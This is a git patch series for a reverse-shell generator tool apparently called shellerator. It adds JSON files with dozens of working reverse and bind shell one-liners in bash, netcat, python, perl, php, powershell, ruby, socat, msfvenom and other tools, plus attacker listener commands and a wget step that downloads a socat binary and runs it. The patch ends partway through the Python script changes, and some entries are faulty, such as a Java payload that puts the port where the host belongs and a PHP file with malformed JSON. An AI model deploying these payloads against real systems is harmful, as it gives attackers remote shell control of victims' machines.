From 9579257f852748374c75c6ba6f847be642a9468b Mon Sep 17 00:00:00 2001 From: lapinou Date: Wed, 17 Apr 2024 01:13:23 +0200 Subject: [PATCH 1/4] Create netcat.json --- payloads/netcat.json | 65 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 payloads/netcat.json diff --git a/payloads/netcat.json b/payloads/netcat.json new file mode 100644 index 0000000..b7af32f --- /dev/null +++ b/payloads/netcat.json @@ -0,0 +1,65 @@ +[ + { + "type": "netcat", + "direction": "reverse", + "payload": "nc -e /bin/sh {LHOST} {LPORT}", + "note": null, + "id": "netcat1" + }, + { + "type": "netcat", + "direction": "reverse", + "payload": "nc -e /bin/bash {LHOST} {LPORT}", + "note": null, + "id": "netcat2" + }, + { + "type": "netcat", + "direction": "reverse", + "payload": "nc -c bash {LHOST} {LPORT}", + "note": null, + "id": "netcat3" + }, + { + "type": "netcat", + "direction": "reverse", + "payload": "mknod backpipe p && nc {LHOST} {LPORT} 0backpipe", + "note": null, + "id": "netcat4" + }, + { + "type": "netcat", + "direction": "reverse", + "payload": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} >/tmp/f", + "note": null, + "id": "netcat5" + }, + { + "type": "netcat", + "direction": "reverse", + "payload": "rm -f /tmp/p; mknod /tmp/p p && nc {LHOST} {LPORT} 0/tmp/p 2>&1", + "note": null, + "id": "netcat6" + }, + { + "type": "netcat", + "direction": "reverse", + "payload": "rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} > f", + "note": null, + "id": "netcat7" + }, + { + "type": "netcat", + "direction": "reverse", + "payload": "rm -f x; mknod x p && nc {LHOST} {LPORT} 0x", + "note": null, + "id": "netcat8" + }, + { + "type": "netcat", + "direction": "bind", + "payload": "nc -lvp {LPORT} -e /bin/sh", + "note": null, + "id": "netcat9" + } +] From 50282e25d180b3882e0ba1d67d5036590cd696d1 Mon Sep 17 00:00:00 2001 From: lapinou Date: Wed, 17 Apr 2024 01:21:48 +0200 Subject: [PATCH 2/4] Add files via upload --- payloads/awk.json | 9 ++++ payloads/bash.json | 65 +++++++++++++++++++++++++++ payloads/groovy.json | 16 +++++++ payloads/java.json | 23 ++++++++++ payloads/lua.json | 16 +++++++ payloads/meterpreter.json | 93 +++++++++++++++++++++++++++++++++++++++ payloads/ncat.json | 16 +++++++ payloads/nodejs.json | 23 ++++++++++ payloads/openssl.json | 16 +++++++ payloads/perl.json | 23 ++++++++++ payloads/php.json | 44 ++++++++++++++++++ payloads/powershell.json | 16 +++++++ payloads/python.json | 30 +++++++++++++ payloads/ruby.json | 23 ++++++++++ payloads/socat.json | 30 +++++++++++++ payloads/tclsh.json | 9 ++++ payloads/telnet.json | 30 +++++++++++++ payloads/war.json | 9 ++++ 18 files changed, 491 insertions(+) create mode 100644 payloads/awk.json create mode 100644 payloads/bash.json create mode 100644 payloads/groovy.json create mode 100644 payloads/java.json create mode 100644 payloads/lua.json create mode 100644 payloads/meterpreter.json create mode 100644 payloads/ncat.json create mode 100644 payloads/nodejs.json create mode 100644 payloads/openssl.json create mode 100644 payloads/perl.json create mode 100644 payloads/php.json create mode 100644 payloads/powershell.json create mode 100644 payloads/python.json create mode 100644 payloads/ruby.json create mode 100644 payloads/socat.json create mode 100644 payloads/tclsh.json create mode 100644 payloads/telnet.json create mode 100644 payloads/war.json diff --git a/payloads/awk.json b/payloads/awk.json new file mode 100644 index 0000000..1ee226b --- /dev/null +++ b/payloads/awk.json @@ -0,0 +1,9 @@ +[ + { + "type": "awk", + "direction": "reverse", + "payload": "awk 'BEGIN {s = \"/inet/tcp/0/{LHOST}/{LPORT}\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null", + "note": null, + "id": "awk1" + } +] \ No newline at end of file diff --git a/payloads/bash.json b/payloads/bash.json new file mode 100644 index 0000000..9de1a53 --- /dev/null +++ b/payloads/bash.json @@ -0,0 +1,65 @@ +[ + { + "type": "bash", + "direction": "reverse", + "payload": "/bin/bash -c '/bin/bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1'", + "note": null, + "id": "bash1" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "/bin/bash -c '/bin/bash -i > /dev/tcp/{LHOST}/{LPORT} 0<&1 2>&1'", + "note": null, + "id": "bash2" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "/bin/bash -i > /dev/tcp/{LHOST}/{LPORT} 0<& 2>&1", + "note": null, + "id": "bash3" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1", + "note": null, + "id": "bash4" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "exec 5<>/dev/tcp/{LHOST}/{LPORT};cat <&5 | while read line; do $line 2>&5 >&5; done", + "note": null, + "id": "bash5" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "exec /bin/sh 0&0 2>&0", + "note": null, + "id": "bash6" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "0<&196;exec 196<>/dev/tcp/{LHOST}/{LPORT}; sh <&196 >&196 2>&196", + "note": null, + "id": "bash7" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "bash -i >& /dev/udp/{LHOST}/{LPORT} 0>&1", + "note": "UDP", + "id": "bash8" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "nc -u -lvp {LPORT}", + "note": "UDP Listener (attacker)", + "id": "bash9" + } +] \ No newline at end of file diff --git a/payloads/groovy.json b/payloads/groovy.json new file mode 100644 index 0000000..078ed21 --- /dev/null +++ b/payloads/groovy.json @@ -0,0 +1,16 @@ +[ + { + "type": "groovy", + "direction": "reverse", + "payload": "String host=\"{LHOST}\";\nint port={LPORT};\nString cmd=\"cmd.exe\";\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();", + "note": null, + "id": "groovy1" + }, + { + "type": "groovy", + "direction": "reverse", + "payload": "Thread.start { // Reverse shell here }", + "note": "More stealthy", + "id": "groovy2" + } +] \ No newline at end of file diff --git a/payloads/java.json b/payloads/java.json new file mode 100644 index 0000000..f4ab935 --- /dev/null +++ b/payloads/java.json @@ -0,0 +1,23 @@ +[ + { + "type": "java", + "direction": "reverse", + "payload": "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/{LHOST}/{LPORT};cat <&5 | while read line; do $line 2>&5 >&5; done\"] as String[])\np.waitFor()", + "note": null, + "id": "java1" + }, + { + "type": "java", + "direction": "reverse", + "payload": "String host=\"{LPORT}\";\nint port={LPORT};\nString cmd=\"cmd.exe\";\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();", + "note": null, + "id": "java2" + }, + { + "type": "java", + "direction": "reverse", + "payload": "Thread thread = new Thread(){public void run(){ //Reverse shell here }}thread.start();", + "note": "More stealthy", + "id": "java3" + } +] \ No newline at end of file diff --git a/payloads/lua.json b/payloads/lua.json new file mode 100644 index 0000000..f95ce3e --- /dev/null +++ b/payloads/lua.json @@ -0,0 +1,16 @@ +[ + { + "type": "lua", + "direction": "reverse", + "payload": "lua -e \"require('socket');require('os');t=socket.tcp();t:connect('{LHOST}','{LPORT}');os.execute('/bin/sh -i <&3 >&3 2>&3');\"", + "note": "Linux", + "id": "lua1" + }, + { + "type": "lua", + "direction": "reverse", + "payload": "lua5.1 -e 'local host, port = \"{LHOST}\", {LPORT} local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \"r\") local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()' ", + "note": "Windows", + "id": "lua2" + } +] \ No newline at end of file diff --git a/payloads/meterpreter.json b/payloads/meterpreter.json new file mode 100644 index 0000000..a695252 --- /dev/null +++ b/payloads/meterpreter.json @@ -0,0 +1,93 @@ +[ + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f elf > shell.elf", + "note": null, + "id": "meterpreter1" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p windows/meterpreter/reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f exe > shell.exe", + "note": null, + "id": "meterpreter2" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p osx/x86/shell_reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f macho > shell.macho", + "note": null, + "id": "meterpreter3" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p windows/meterpreter/reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f asp > shell.asp", + "note": null, + "id": "meterpreter4" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p java/jsp_shell_reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f raw > shell.jsp", + "note": null, + "id": "meterpreter5" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p java/jsp_shell_reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f war > shell.war", + "note": null, + "id": "meterpreter6" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p cmd/unix/reverse_python LHOST=\"{LHOST}\" LPORT={LPORT} -f raw > shell.py", + "note": null, + "id": "meterpreter7" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p cmd/unix/reverse_bash LHOST=\"{LHOST}\" LPORT={LPORT} -f raw > shell.sh", + "note": null, + "id": "meterpreter8" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p cmd/unix/reverse_perl LHOST=\"{LHOST}\" LPORT={LPORT} -f raw > shell.pl", + "note": null, + "id": "meterpreter9" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p windows/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe > reverse.exe", + "note": "Windows Staged reverse TCP", + "id": "meterpreter10" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p windows/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe > reverse.exe", + "note": "Windows Stageless reverse TCP", + "id": "meterpreter11" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf >reverse.elf", + "note": "Linux Staged reverse TCP", + "id": "meterpreter12" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p linux/x86/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf >reverse.elf", + "note": "Linux Stageless reverse TCP", + "id": "meterpreter13" + } +] \ No newline at end of file diff --git a/payloads/ncat.json b/payloads/ncat.json new file mode 100644 index 0000000..af425dc --- /dev/null +++ b/payloads/ncat.json @@ -0,0 +1,16 @@ +[ + { + "type": "ncat", + "direction": "reverse", + "payload": "ncat {LHOST} {LPORT} -e /bin/bash", + "note": null, + "id": "ncat1" + }, + { + "type": "ncat", + "direction": "reverse", + "payload": "ncat --udp {LHOST} {LPORT} -e /bin/bash", + "note": null, + "id": "ncat2" + } +] \ No newline at end of file diff --git a/payloads/nodejs.json b/payloads/nodejs.json new file mode 100644 index 0000000..0e9c202 --- /dev/null +++ b/payloads/nodejs.json @@ -0,0 +1,23 @@ +[ + { + "type": "nodejs", + "direction": "reverse", + "payload": "require('child_process').exec('nc -e /bin/sh {LHOST} {LPORT}')", + "note": null, + "id": "nodejs1" + }, + { + "type": "nodejs", + "direction": "reverse", + "payload": "-var x = global.process.mainModule.require\n-x('child_process').exec('nc {LHOST} {LPORT} -e /bin/bash')", + "note": null, + "id": "nodejs2" + }, + { + "type": "nodejs", + "direction": "reverse", + "payload": "(function(){\n var net = require(\"net\"),\n cp = require(\"child_process\"),\n sh = cp.spawn(\"/bin/sh\", []);\n var client = new net.Socket();\n client.connect({LPORT}, \"{LHOST}\", function(){\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n });\n return /a/; // Prevents the Node.js application form crashing\n})();", + "note": null, + "id": "nodejs3" + } +] \ No newline at end of file diff --git a/payloads/openssl.json b/payloads/openssl.json new file mode 100644 index 0000000..ee7c6e8 --- /dev/null +++ b/payloads/openssl.json @@ -0,0 +1,16 @@ +[ + { + "type": "openssl", + "direction": "reverse", + "payload": "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {LHOST}:{LPORT} > /tmp/s; rm /tmp/s", + "note": null, + "id": "openssl1" + }, + { + "type": "openssl", + "direction": "reverse", + "payload": "ncat --ssl -vv -l -p {LPORT}", + "note": "Listener (attacker)", + "id": "openssl2" + } +] \ No newline at end of file diff --git a/payloads/perl.json b/payloads/perl.json new file mode 100644 index 0000000..5845700 --- /dev/null +++ b/payloads/perl.json @@ -0,0 +1,23 @@ +[ + { + "type": "perl", + "direction": "reverse", + "payload": "perl -e 'use Socket;$i=\"{LHOST}\";$p={LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", + "note": null, + "id": "perl1" + }, + { + "type": "perl", + "direction": "reverse", + "payload": "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{LHOST}:{LPORT}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'", + "note": null, + "id": "perl2" + }, + { + "type": "perl", + "direction": "reverse", + "payload": "perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"{LHOST}:{LPORT}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'", + "note": "Windows", + "id": "perl3" + } +] \ No newline at end of file diff --git a/payloads/php.json b/payloads/php.json new file mode 100644 index 0000000..e738d19 --- /dev/null +++ b/payloads/php.json @@ -0,0 +1,44 @@ +[ + { + "type": "php", + "direction": "reverse", + "payload": "php -r '$sock=fsockopen(\"{LHOST}\",{LPORT});exec(\"/bin/sh -i <&3 >&3 2>&3\");'", + "note": null, + "id": "php1" + }, + { + "type": "php", + "direction": "reverse", + "payload": "php -r '$s=fsockopen(\"{LHOST}\",{LPORT});$proc=proc_open(\"/bin/sh -i\", array(0=>$s, 1=>$s, 2=>$s)", + "note": null, + "id": "php2" + } + { + "type": "php", + "direction": "reverse", + "payload": "php -r '$s=fsockopen(\"{LHOST}\",{LPORT});shell_exec(\"/bin/sh -i <&3 >&3 2>&3\");'", + "note": null, + "id": "php3" + }, + { + "type": "php", + "direction": "reverse", + "payload": "php -r '$s=fsockopen(\"{LHOST}\",{LPORT});system(\"/bin/sh -i <&3 >&3 2>&3\");'", + "note": null, + "id": "php4" + }, + { + "type": "php", + "direction": "reverse", + "payload": "php -r '$s=fsockopen(\"{LHOST}\",{LPORT});popen(\"/bin/sh -i <&3 >&3 2>&3\", \"r\");'", + "note": null, + "id": "php5" + }, + { + "type": "php", + "direction": "reverse", + "payload": "php -r '$s='127.0.0.1';$p=443;@error_reporting(0);@ini_set(\"error_log\",NULL);@ini_set(\"log_errors\",0);@set_time_limit(0);umask(0);if($s=fsockopen($s,$p,$n,$n)){if($x=proc_open('/bin/sh$IFS-i',array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$p,getcwd())){stream_set_blocking($p[0],0);stream_set_blocking($p[1],0);stream_set_blocking($p[2],0);stream_set_blocking($s,0);while(true){if(feof($s))die('connection/closed');if(feof($p[1]))die('shell/not/response');$r=array($s,$p[1],$p[2]);stream_select($r,$n,$n,null);if(in_array($s,$r))fwrite($p[0],fread($s,1024));if(in_array($p[1],$r))fwrite($s,fread($p[1],1024));if(in_array($p[2],$r))fwrite($s,fread($p[2],1024));}fclose($p[0]);fclose($p[1]);fclose($p[2]);proc_close($x);}else{die(\"proc_open/disabled\");}}else{die(\"not/connect\");}'", + "note": null, + "id": "php6" + } +] \ No newline at end of file diff --git a/payloads/powershell.json b/payloads/powershell.json new file mode 100644 index 0000000..785df38 --- /dev/null +++ b/payloads/powershell.json @@ -0,0 +1,16 @@ +[ + { + "type": "powershell", + "direction": "reverse", + "payload": "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"{LHOST}\",{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()", + "note": null, + "id": "powershell1" + }, + { + "type": "powershell", + "direction": "reverse", + "payload": "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('{LHOST}',{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"", + "note": null, + "id": "powershell2" + } +] \ No newline at end of file diff --git a/payloads/python.json b/payloads/python.json new file mode 100644 index 0000000..a0aceee --- /dev/null +++ b/payloads/python.json @@ -0,0 +1,30 @@ +[ + { + "type": "python", + "direction": "reverse", + "payload": "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{LHOST}\",{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", + "note": null, + "id": "python1" + }, + { + "type": "python", + "direction": "reverse", + "payload": "export RHOST=\"{LHOST}\";export RPORT={LPORT};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'", + "note": null, + "id": "python2" + }, + { + "type": "python", + "direction": "reverse", + "payload": "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{LHOST}\",{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'", + "note": null, + "id": "python3" + }, + { + "type": "python", + "direction": "reverse", + "payload": "C:\\Python27\\python.exe -c \"(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('{LHOST}', {LPORT})), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))\"", + "note": "Windows", + "id": "python4" + } +] \ No newline at end of file diff --git a/payloads/ruby.json b/payloads/ruby.json new file mode 100644 index 0000000..e935f03 --- /dev/null +++ b/payloads/ruby.json @@ -0,0 +1,23 @@ +[ + { + "type": "ruby", + "direction": "reverse", + "payload": "ruby -rsocket -e'f=TCPSocket.open(\"{LHOST}\",{LPORT}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'", + "note": null, + "id": "ruby1" + }, + { + "type": "ruby", + "direction": "reverse", + "payload": "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"{LHOST}\",\"{LPORT}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", + "note": null, + "id": "ruby2" + }, + { + "type": "ruby", + "direction": "reverse", + "payload": "ruby -rsocket -e 'c=TCPSocket.new(\"{LHOST}\",\"{LPORT}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", + "note": "Windows", + "id": "ruby3" + } +] \ No newline at end of file diff --git a/payloads/socat.json b/payloads/socat.json new file mode 100644 index 0000000..48c1e03 --- /dev/null +++ b/payloads/socat.json @@ -0,0 +1,30 @@ +[ + { + "type": "socat", + "direction": "reverse", + "payload": "/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{LHOST}:{LPORT}", + "note": null, + "id": "socat1" + }, + { + "type": "socat", + "direction": "reverse", + "payload": "socat tcp-connect:{LHOST}:{LPORT} exec:\"bash -li\",pty,stderr,setsid,sigint,sane", + "note": null, + "id": "socat2" + }, + { + "type": "socat", + "direction": "reverse", + "payload": "wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{LHOST}:{LPORT}", + "note": null, + "id": "socat3" + }, + { + "type": "socat", + "direction": "reverse", + "payload": "socat file:`tty`,raw,echo=0 TCP-L:{LPORT}", + "note": "Listener (attacker)", + "id": "socat4" + } +] \ No newline at end of file diff --git a/payloads/tclsh.json b/payloads/tclsh.json new file mode 100644 index 0000000..8450d8e --- /dev/null +++ b/payloads/tclsh.json @@ -0,0 +1,9 @@ +[ + { + "type": "tclsh", + "direction": "reverse", + "payload": "echo 'set s [socket {LHOST} {LPORT}];while 42 { puts -nonewline $s \"shell>\";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh", + "note": null, + "id": "tclsh1" + } +] \ No newline at end of file diff --git a/payloads/telnet.json b/payloads/telnet.json new file mode 100644 index 0000000..d6f5a55 --- /dev/null +++ b/payloads/telnet.json @@ -0,0 +1,30 @@ +[ + { + "type": "telnet", + "direction": "reverse", + "payload": "rm -f /tmp/p; mknod /tmp/p p && telnet {LHOST} {LPORT} 0/tmp/p 2>&1", + "note": null, + "id": "telnet1" + }, + { + "type": "telnet", + "direction": "reverse", + "payload": "telnet {LHOST} {LPORT} | /bin/bash | telnet {LHOST} 667", + "note": null, + "id": "telnet2" + }, + { + "type": "telnet", + "direction": "reverse", + "payload": "rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet {LHOST} {LPORT} > f", + "note": null, + "id": "telnet3" + }, + { + "type": "telnet", + "direction": "reverse", + "payload": "rm -f x; mknod x p && telnet {LHOST} {LPORT} 0x", + "note": null, + "id": "telnet4" + } +] \ No newline at end of file diff --git a/payloads/war.json b/payloads/war.json new file mode 100644 index 0000000..c4950e8 --- /dev/null +++ b/payloads/war.json @@ -0,0 +1,9 @@ +[ + { + "type": "war", + "direction": "reverse", + "payload": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f war > reverse.war\nstrings reverse.war | grep jsp # in order to get the name of the file", + "note": null, + "id": "war1" + } +] \ No newline at end of file From dbdc1d80841daddcb7d09f5bb53eb2c24b59bb9f Mon Sep 17 00:00:00 2001 From: lapinou Date: Wed, 17 Apr 2024 01:23:39 +0200 Subject: [PATCH 3/4] Update shellerator.py --- shellerator.py | 167 ++++++++++++------------------------------------- 1 file changed, 39 insertions(+), 128 deletions(-) diff --git a/shellerator.py b/shellerator.py index f2e2c51..a066d8c 100755 --- a/shellerator.py +++ b/shellerator.py @@ -16,6 +16,7 @@ import re import psutil import socket +import json from colorama import Fore from colorama import Style import platform @@ -24,6 +25,8 @@ else: from simple_term_menu import TerminalMenu +shells = [] + def menu(title, menu_list): if platform.system() == 'Windows': selection = SelectionMenu.get_selection(menu_list, title=title, show_exit_option=False) @@ -61,14 +64,19 @@ def select_address(): return menu_with_custom_choice("Listener interface/address?", menu_list) -def list_shells(): +def list_shells(type): + f = open(f"payloads/{type}.json") + shells = json.load(f) + print(Fore.BLUE + Style.BRIGHT + 'Reverse shells' + Style.RESET_ALL) - for shell in sorted(revshells.keys()): - print(' - ' + shell) + for shell in shells: + if shell['direction'] == 'reverse': + print(f"[{shell['id']}] - {shell['payload']}") print() print(Fore.BLUE + Style.BRIGHT + 'Bind shells' + Style.RESET_ALL) - for shell in sorted(bindshells.keys()): - print(' - ' + shell) + for shell in shells: + if shell['direction'] == 'bind': + print(f"[{shell['id']}] - {shell['payload']}") quit() def get_options(): @@ -85,15 +93,20 @@ def get_options(): # typeoptions and portoption are two options either bindshell or revshell will need (https://stackoverflow.com/questions/23775378/allowing-same-option-in-different-argparser-group) typeoption = bindshell.add_argument('-t', '--type', dest='TYPE', type=str.lower, help='Type of the shell to generate (Bash, Powershell, Java...)') portoption = bindshell.add_argument('-lp', '--lport', dest='LPORT', type=str, help='Listener Port') + idoption = bindshell.add_argument('--id', dest='ID', type=str, help='id') + quietoption = bindshell.add_argument('--quiet', dest='QUIET', action='store_true', help='QUIET') revshell = parser.add_argument_group('Reverse shell options') revshell._group_actions.append(typeoption) revshell.add_argument('-lh', '--lhost', dest='LHOST', type=str, help='Listener IP address') revshell._group_actions.append(portoption) options = parser.parse_args() + if options.LIST: - list_shells() + list_shells(options.TYPE) + if options.SHELLTYPE == 'revshells' and not options.LHOST: options.LHOST = select_address() + if not options.LPORT: menu_list = [ 'L33t (1337)', @@ -102,140 +115,38 @@ def get_options(): 'DNS (53)', ] options.LPORT = menu_with_custom_choice("Listener port?", menu_list) + if not options.TYPE: shells_dict = globals()[options.SHELLTYPE] menu_list = sorted(list(shells_dict.keys())) options.TYPE = menu('What type of shell do you want?', menu_list) return options -# Helper function for populate_shells() to add values to the dictionnaries -def add_shell(shells_dict, type, shell, notes=None): - if not type in shells_dict.keys(): - shells = [] +def print_shell(shell, lport, lhost): + if options.LHOST is not None: + shell_str = shell['payload'].replace('{LHOST}', lhost).replace('{LPORT}', lport).strip() else: - shells = shells_dict[type] - shells.append((notes, shell)) - shells_dict.update({type:shells}) - -# Add shells to the main dictionnaries: revshells and bindshells -def populate_shells(): - add_shell(revshells, 'bash', '''/bin/bash -c '/bin/bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1' ''') - add_shell(revshells, 'bash', '''/bin/bash -c '/bin/bash -i > /dev/tcp/{LHOST}/{LPORT} 0<&1 2>&1' ''') - add_shell(revshells, 'bash', '''/bin/bash -i > /dev/tcp/{LHOST}/{LPORT} 0<& 2>&1''') - add_shell(revshells, 'bash', '''bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1''') - add_shell(revshells, 'bash', '''exec 5<>/dev/tcp/{LHOST}/{LPORT};cat <&5 | while read line; do $line 2>&5 >&5; done''') - add_shell(revshells, 'bash', '''exec /bin/sh 0&0 2>&0''') - add_shell(revshells, 'bash', '''0<&196;exec 196<>/dev/tcp/{LHOST}/{LPORT}; sh <&196 >&196 2>&196''') - 